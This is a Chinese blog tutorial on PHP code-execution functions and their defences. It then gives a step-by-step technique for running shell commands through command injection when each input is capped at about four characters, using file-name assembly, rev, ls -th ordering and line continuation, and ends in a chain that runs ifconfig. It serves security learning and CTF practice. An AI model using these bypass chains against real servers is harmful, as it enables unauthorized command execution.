php代码执行与命令注入突破长度限制

最新推荐文章于 2023-09-25 10:43:19 发布
最新推荐文章于 2023-09-25 10:43:19 发布
阅读量901 收藏 4
点赞数
分类专栏: web安全 命令执行 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41874930/article/details/115481462
版权
本文探讨了PHP代码执行的常见方式,如eval、require等,并详细阐述了如何通过防御措施防止代码执行攻击,包括升级PHP版本、禁用危险函数、安全地处理文件包含。此外,还深入介绍了命令注入如何突破长度限制,通过命令组装、反转、控制顺序和续行等技巧实现,最后提出了完整的利用链。防御策略和实战技巧对于提升PHP应用的安全性至关重要。
摘要由CSDN通过智能技术生成

文章目录

1. php代码执行方式

涉及到的函数:

eval
require
include
assert
preg_match
create_function

2. php代码执行防御方式

  • 升级到PHP 7.1,该版本对大部分常见的执行动态代码的方法进行了封堵。

  • php.ini中,关闭“allow_url_fopen”。在打开它的情况下,可以通过 phar:// 等协议丢给include,让其执行动态代码。

  • php.ini中,通过disable_functions关闭 exec,passthru,shell_exec,system 等函数,禁止PHP调用外部程序。

  • 永远不要在代码中使用eval。

  • 设置好上传文件夹的权限,禁止从该文件夹执行代码。

  • include 文件的时候,注意文件的来源;需要动态include时做好参数过滤。

3. 命令注入突破长度限制

我们先创建一个文件夹,确保里面没有任何文件。

3.1 命令组装

依次执行下面三条命令,相当于执行echo hello

>echo
>hello
*

在这里插入图片描述

3.2 反转命令

如果我们想执行,ls -l 但是命令被限制了一次只能执行4个字符。如果我们使用以下命令:

>ls
>-l

是会失败的。
在这里插入图片描述
我们使用另外一个方法,使得命令反转:

>l- 
>sl

在这里插入图片描述
使用如下命令,将l- sl输入到文件夹v中。

>dir
*>v

在这里插入图片描述

>rev #功能为反转内容,rev 123 ==》 321
*v  #相当于rev v

在这里插入图片描述
将*v写入到新的文件中并执行新文件:

*v>e
sh e

在这里插入图片描述

3.3 控制顺序

跟上面的一样,我们需要执行ls -l。

>-l
>\ \\
>ls\\
ls -th >e
sh e

在这里插入图片描述

3.4 命令续行

我们首先要知道下面命令是可以执行的,也就是命令是可以换行的:

l\
s

在这里插入图片描述
我们凑一个ifconfig:

>ig\\
>nf\\
>co\\
>if\\
ls -th>q
sh q

在这里插入图片描述

3.5 完整利用链

1.生成 ls -th >g命令,只能用g或者位置小于g的字符,否则会出错:

>g\>
>ht-
>sl
>dir
*>v
>rev
*v>x
>\;
>ig\\
>nf\\
>co\\
>if\\
sh x

实现了最多4个字符,最终执行了ifconfig命令:
在这里插入图片描述

参考文章

从PHP源码与扩展开发谈PHP任意代码执行与防御
挖洞经验 | 命令注入突破长度限制

Shanfenglan7
关注
专栏目录
网络安全系列&php系列:php执行先后顺序_CTFweb类型(二十一)无数字字母的命令执行及相关例题
weixin_54626591的博客
06-27 727
php执行先后顺序_CTFweb类型(二十一)无数字字母的命令执行及相关例题
sql注入的攻击与利用
MSB_WLAQ的博客
10-11 633
前言 本文叙述了在Mysql、MSsql、Oracle、PostgreSQL平台下的sql注入探测方式与利用,作为个人笔记,没有框架以及中间件的参与。 文章的内容并不全面,日后有接触新的方法会有补充。 探测方法 首先贴出增删改查的基本语句,加粗部分为用户可控: mysql: select item from table where valuelike db_value; select item1,item2 from table where '**value1'**like db_value
eval长度限制绕过 && PHP5.6新特性
m0_59049258的博客
08-22 731
死亡绕过代码:exit.phpphpphp exit;>';?查看后台,确实生成了文件,但是文件内容拼接在exit后面。程序遇见即结束。将绕过这种限制的行为称为死亡绕过。我们想要绕过就需要将
命令注入突破长度限制
qq115399231的博客
07-14 1334
命令注入突破长度限制 碰见了不少像这样的题 原型来自 HITCON CTF 2017 的 BabyFirst Revenge <?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); if (i...
挖洞经验 | 命令注入突破长度限制
3569
12-03 2512
0×01 背景 http://www.freebuf.com/articles/web/154453.html 很多时候,在我们历经千辛万苦挖掘出一个漏洞或者找到一个利用点的时候,却因为一些egg hurt的限制,导致get shell或者send payload无法成功,其实很多高手都是有一些trick的,但是往往一串包含各种trick的高深payload甩得你不知所云
命令注入突破长度限制 | 从CTF题目讲起
纸房子
12-03 7141
命令注入中往往会存在注入命令长度过短的情况,无法将全部命令完全的输入进去,这种情况下就需要我们来想办法突破系统命令长度限制。我们从三道CTF题目来讲解一下这种渗透策略。一.BabyfirstSovled: 33 / 969 Difficulty: ★★ Tag: WhiteBox, PHP, Command InjectionIdeaUse NewLine to bypass regula
linux手动注入网络数据_挖洞经验 | 命令注入突破长度限制
weixin_42297347的博客
01-13 141
0x01 背景很多时候,在我们历经千辛万苦挖掘出一个漏洞或者找到一个利用点的时候,却因为一些egg hurt的限制,导致get shell或者send payload无法成功,其实很多高手都是有一些trick的,但是往往一串包含各种trick的高深payload甩得你不知所云最近遇到这样一个问题。命令长度限制在5,如何完成注入get shell?Array什么的都尝试无果,在学习了各种大牛的tri...
PHP代码审计之基础篇
热门推荐
Mi1k7ea
04-18 1万+
最近在学PHP代码审计,那就将学习的笔记都整理一遍吧~ 前期准备: 1、安装相关软件,如Sublime text、 Notepad++、editplus、 Seay源代码审计系统等 2、获得源码,可以到网上下载各种网站源码 3、安装网站 审计方法: 通读全文法:麻烦但全面 敏感函数参数回溯法:高效常用,Seay源代码审计系统 定向功能分析法:主要根据程序的业
关于命令执行Bypass的一些思路
hackzkaq的博客
08-24 1290
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 作者:掌控安全-xiao_yi 一、常见命令执行的函数 system() system(string $command, int &$return_var = ?): string 执行系统命令,有回显 passthru() passthru(string $command, int &$return_var = ?): void 执行系统命令并且显示原始输出 shell_exec() shell_exec(string
请求头长度限制php,eval长度限制绕过 && PHP5.6新特性
weixin_28811757的博客
04-06 518
昨天晚上 @roker 在小密圈里问了一个问题,就是eval(xxx),xxx长度限制为16个字符,而且不能用eval或assert,怎么执行命令。我把他的叙述写成代码,大概如下:$param = $_REQUEST['param'];if(strlen($param)<17 && stripos($param,'eval') === false && str...
php命令执行绕过,[投稿]Webshell下命令执行限制及绕过方法
weixin_30270715的博客
03-17 887
0x00前言上传webshell后,执行命令时或许没法执行了,这时我们该分析下原理并想出绕过方式,防守方也必须根据绕过方式想想更强的防御.0x01 php webshell执行命令原理php webshell(以下简称webshell)下是怎么执行系统命令的?我们找一个webshell分析下搜索关键字定位到以下代码Defaultfunction execute($cfe) {$res = '';i...
php exec运行php命令不行
最新发布
aoxiangchina的博客
09-25 393
由于php是0以上的版本,取消了安全模式,所以考虑PHP.ini文件配置。但是要被触发,比如,当你把文件上传到服务器上以后,打开这个页面,就会直接读取数据库,比如某些博客程序,别人给你的,他直接多放了一个文件,里面有获取config.php的,然后直接显示这个文件的密码配置,这个就是后门。如果是命令行使用的话,直接运行即可,如果是apache使用的话,需要重启apache,如果是nginx配合使用的话,需要重启php-fpm,exec函数执行命令并不需要安全目录,只要有执行权限就可以执行
利用PHP的NAN和INF来获取字符串来自增绕过长度限制
Huamang的博客
08-19 864
最近在一道题目里面学到了一个新的小技巧 在php中,字符串是可以递增的,如下: 但是不可递减 这道题是这样的 <?php error_reporting(0); if ($_GET['looklook']){ highlight_file(__FILE__); }else{ setcookie("hint", "?looklook", time()+3600); } if (isset($_POST['ctf_show'])) { $ctfshow = $_POST['ctf
php 检测字符长度,php验证字符串长度问题
weixin_33941707的博客
03-29 1174
C:\Users\Administrator>php -r "echo strlen('你好')";4C:\Users\Administrator>php -r "echo mb_strlen('你好')";4C:\Users\Administrator>php -r "echo mb_strlen('你好','utf-8')";3C:\Users\Administrator&g...
php突破ua限制,php cul突破防爬虫,服务器反爬虫攻略:Apache/Nginx/PHP禁止某些User Agent抓取网站...
weixin_36040020的博客
04-14 380
我们都知道网络上的爬虫非常多,有对网站收录有益的,比如百度蜘蛛(Baiduspider),也有不但不遵守robots规则对服务器造成压力,还不能为网站带来流量的无用爬虫,比如宜搜蜘蛛(YisouSpider)(最新补充:宜搜蜘蛛已被UC神马搜索收购!所以本文已去掉宜搜蜘蛛的禁封!==>相关文章)。最近张戈发现nginx日志中出现了好多宜搜等垃圾的抓取记录,于是整理收集了网络上各种禁止垃圾蜘蛛...
php curl 抓58同城避免ip限制
lorraine_40t的博客
08-19 1056
原理:伪造CURLOPT_REFERER 伪造来源ip 伪造ua /** * * @param type $url * @param type $type * @param type $arr * @return type */ public function http_curl($url, $type = 'g...
PHP防抓取数据curl 解决方法
xuan2717的博客
08-30 247
PHP防抓取数据curl 解决方法
PTA习题 5-26 单词长度
Coding
03-12 3202
https://pta.patest.cn/pta/test/14/exam/4/question/806 5-26 单词长度   (15分) 你的程序要读入一行文本,其中以空格分隔为若干个单词,以.结束。你要输出每个单词的长度。这里的单词与语言无关,可以包括各种符号,比如it's算一个单词,长度为4。注意,行中可能出现连续的空格;最后的.不计算在内。 输入格式: 输入在一行中给出一行文本...
PHP执行exec遇到的坑(linux权限的坑)
守护大白菜的博客
07-31 3377
坑一 今天在使用php中的exec()命令,下载搜狗推广数据报表压缩包,解压的时候遇到一个坑,搜狗给了一个链接,在浏览器访问的时候直接下载的是.zip的压缩包,于是使用 //下载压缩包 exec("wget -O /home/www/test/filename.zip 'sougou_url'");//注意url要用单引号包含住 //解压 exec('unzip -o /home/www...
命令注入工具consoleinject.exe
08-20
consoleinject.exe是一种命令注入工具,它的主要功能是将外部命令注入命令行窗口中。 通过使用consoleinject.exe,我们可以在命令行窗口中执行一些外部命令,并将结果输出到窗口中。这对于一些需要与命令行交互的任务非常有用,比如自动化测试、漏洞利用等。 consoleinject.exe的使用方法相对简单。首先,我们需要准备要注入命令,并将其保存到一个文本文件中。然后,通过命令行运行consoleinject.exe,并指定要注入命令文件路径。consoleinject.exe会将命令文件中的内容注入命令行窗口中,并执行这些命令。 除了注入外部命令,consoleinject.exe还支持一些其他功能。例如,我们可以使用consoleinject.exe来自动化一些常用的命令行任务,比如创建文件、修改文件权限等。此外,consoleinject.exe还支持一些高级功能,如将命令行窗口设置为透明、自定义命令行样式等。 总的来说,consoleinject.exe是一种非常有用的命令注入工具,它可以帮助我们更方便地与命令行交互,并完成一些自动化任务。但需要注意的是,使用这种工具需要注意安全性,避免滥用或不当使用,以免造成潜在的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值